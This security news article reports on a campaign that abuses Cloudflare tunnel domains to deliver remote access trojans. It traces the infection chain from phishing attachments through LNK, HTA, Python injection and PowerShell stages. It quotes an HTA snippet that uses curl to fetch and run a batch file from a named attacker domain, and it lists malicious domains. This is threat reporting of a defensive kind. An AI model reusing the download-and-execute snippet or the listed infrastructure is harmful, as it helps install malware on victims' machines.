Cybersecurity experts have identified a sophisticated attack campaign exploiting Cloudflare’s tunnel infrastructure to distribute various remote access trojans (RATs).

The infrastructure, which has demonstrated remarkable resilience since February 2024, serves as a distribution platform for malicious files and trojans that enable attackers to gain unauthorized access to victims’ systems.

Security vendors including Forcepoint, Fortinet, Orange, and Proofpoint have documented this persistent threat, highlighting its evolving nature and growing impact on organizations worldwide.

The primary infection vector begins with deceptive phishing emails containing malicious attachments disguised as invoices or orders.

These emails often create false urgency and may include fabricated conversation threads with forged replies to appear legitimate.

The attachment typically uses the “application/windows-library+xml” file format, which frequently bypasses email security gateways due to its seemingly innocuous nature compared to binary files.

When opened, this file establishes a connection to a remote WebDav resource hosted on the Cloudflare tunnel infrastructure.

Sekoia TDR (Threat Detection & Research) team analysts have been monitoring this attack infrastructure, internally referred to as “Cloudflare tunnel infrastructure to deliver multiple RATs.”

Their analysis reveals an intricate multi-stage infection chain that employs various obfuscation techniques to evade detection systems.

The complexity of this attack demonstrates how threat actors continue to develop innovative methods to bypass modern security controls, even in 2025.

The attackers leverage domains with the “trycloudflare.com” suffix, including “malawi-light-pill-bolt.trycloudflare.com,” “players-time-corresponding-th.trycloudflare.com,” and others to host their malicious content.

This infrastructure delivers payloads that ultimately establish persistent remote access to compromised systems, potentially enabling data theft and further network compromise.

Infection Chain Mechanics

The infection process begins when a user interacts with a LNK file disguised as a PDF document.

This shortcut, instead of opening a legitimate document, executes an HTA file from the same remote server. The HTA content reveals how the attack progresses:-

Set oShell = CreateObject("WScript.Shell")
oShell.Run "cmd. exe /c curl -o %temp%\ben.bat https://players-time-corresponding-th.trycloudflare.com/ben.bat && %temp%\ben.bat", 0, false
self. Close

This script triggers a BAT file that installs Python and executes obfuscated Python code, which then injects the next payload stage into “notepad.exe” processes.

For persistence, the malware creates startup entries with two VBS files and another BAT file placed in the Windows Startup folder.

The final stage uses PowerShell to reflectively load a payload downloaded from a JPEG image with an embedded base64 payload.

This establishes the RAT’s connection to its command and control server, often using dynamic DNS services like “duckdns.org” for communication.

Infection chains (Source – Sekoia)

Infection chains distributing AsyncRAT via a complex multi-stage process involving Windows-library files, LNK files, HTA execution, and Python injection.*

The evolution of this attack campaign demonstrates how threat actors continuously adapt their techniques to bypass security controls, emphasizing the importance of multi-layered detection approaches and continuous monitoring for similar attack patterns.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy